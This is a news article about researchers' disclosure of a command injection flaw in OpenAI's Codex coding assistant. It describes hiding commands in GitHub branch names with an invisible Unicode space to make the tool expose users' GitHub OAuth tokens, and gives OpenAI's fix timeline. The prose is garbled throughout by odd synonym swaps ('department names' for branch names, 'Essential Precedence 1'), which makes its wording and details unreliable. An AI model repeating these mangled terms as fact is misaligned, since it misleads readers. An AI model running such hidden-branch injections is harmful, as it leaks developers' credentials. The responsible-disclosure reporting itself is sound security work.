Close Menu
    Main Menu
    • Home
    • News
    • Tech
    • Robotics
    • ML & Research
    • AI
    • Digital Transformation
    • AI Ethics & Regulation
    • Thought Leadership in AI

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    The $1T Market Crash, Citi’s Outcomes Mandate, and the AI Revolution at Amazon, Accenture, and Workday

    March 31, 2026

    Software program, in a Time of Worry – O’Reilly

    March 31, 2026

    The whole lot You Have to Know

    March 30, 2026
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Home»AI Ethics & Regulation»OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens
    AI Ethics & Regulation

    OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens

    Declan MurphyBy Declan MurphyMarch 30, 2026No Comments3 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Reddit
    OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens
    Share
    Facebook Twitter LinkedIn Pinterest Email Copy Link


    BeyondTrust Phantom Labs researchers have revealed a important command injection vulnerability in OpenAI’s Codex. The flaw allowed attackers to steal delicate GitHub OAuth tokens utilizing hidden Unicode characters in department names, doubtlessly compromising complete enterprise environments.

    A considerable safety vulnerability has been recognized in OpenAI’s Codex, a software utilized by numerous builders to help in writing and reviewing code. The flaw might have allowed hackers to steal GitHub Entry Tokens, that are the keys that give somebody full management over an individual’s or an organization’s personal code repositories.

    These findings come from researchers at BeyondTrust Phantom Labs, who discovered {that a} easy lack of enter sanitization might flip a coding assistant into a possible doorway for information theft.

    The Invisible Department Trick

    To your info, instruments like Codex want a token to entry a programmer’s work. Phantom Labs researchers found the system didn’t correctly examine consumer information, permitting for a command injection via the GitHub department identify. Additional probing revealed that attackers might cover malicious directions utilizing an Ideographic House, a particular Unicode character that appears like a traditional area to the human eye.

    Whereas a developer would possibly assume they’re viewing a regular department named primary, a hidden command may very well be working within the background. “When user-controlled enter is handed into these environments with out strict validation, the end result is not only a bug, it’s a scalable assault path,” researchers famous within the weblog publish shared with Hackread.com. In testing, they efficiently compelled the system to disclose secret login tokens in plain textual content.

    Scaling the Assault

    Researchers word this was not only a risk to particular person customers, because the flaw affected the ChatGPT web site, Codex SDK, and varied developer extensions. If a hacker modified a challenge’s default department to a malicious model, anybody opening it might have their credentials exfiltrated.

    Additionally value noting is that the chance prolonged past the cloud. The staff, led by Director of Analysis Fletcher Davis, discovered that Codex shops delicate login information in a file referred to as auth.json on a consumer’s native laptop. If a hacker accessed a developer’s machine, they might elevate these tokens to maneuver via a complete organisation’s GitHub surroundings.

    Codex assault path (Supply: BeyondTrust)

    A Speedy Response

    Luckily, the Phantom Labs staff was fast to report the flaw to OpenAI on 16 December 2025. This led to an preliminary hotfix only a week in a while 23 December. By 30 January 2026, OpenAI had carried out stronger protections for shell instructions and restricted the entry these tokens have, finally labelling the difficulty a “Essential Precedence 1” vulnerability on 5 February.

    OpenAI has since confirmed the fixes are full, thanking the researchers for his or her partnership. Nonetheless, it reminds us to watch out with AI instruments as they aren’t simply assistants however stay environments with high-level entry to our most delicate information.



    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Declan Murphy
    • Website

    Related Posts

    Google Units 2029 Deadline for Quantum-Secure Cryptography

    March 30, 2026

    Russian CTRL Toolkit Delivered by way of Malicious LNK Information Hijacks RDP by way of FRP Tunnels

    March 30, 2026

    Malicious Browser Extensions Hijack Customers’ AI Chats in New “Immediate Poaching” Assault

    March 30, 2026
    Top Posts

    Evaluating the Finest AI Video Mills for Social Media

    April 18, 2025

    Utilizing AI To Repair The Innovation Drawback: The Three Step Resolution

    April 18, 2025

    Midjourney V7: Quicker, smarter, extra reasonable

    April 18, 2025

    Meta resumes AI coaching utilizing EU person knowledge

    April 18, 2025
    Don't Miss

    The $1T Market Crash, Citi’s Outcomes Mandate, and the AI Revolution at Amazon, Accenture, and Workday

    By Charlotte LiMarch 31, 2026

    http://visitors.libsyn.com/futureofworkpodcast/Audio_-_Best_of_1st_Quarter_Episode_2026_-_Ready.mp3 Let’s be sincere, most CHRO teams on the market are dangerous. They’re costly, full…

    Software program, in a Time of Worry – O’Reilly

    March 31, 2026

    The whole lot You Have to Know

    March 30, 2026

    OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens

    March 30, 2026
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo

    Subscribe to Updates

    Get the latest creative news from SmartMag about art & design.

    UK Tech Insider
    Facebook X (Twitter) Instagram
    • About Us
    • Contact Us
    • Privacy Policy
    • Terms Of Service
    • Our Authors
    © 2026 UK Tech Insider. All rights reserved by UK Tech Insider.

    Type above and press Enter to search. Press Esc to cancel.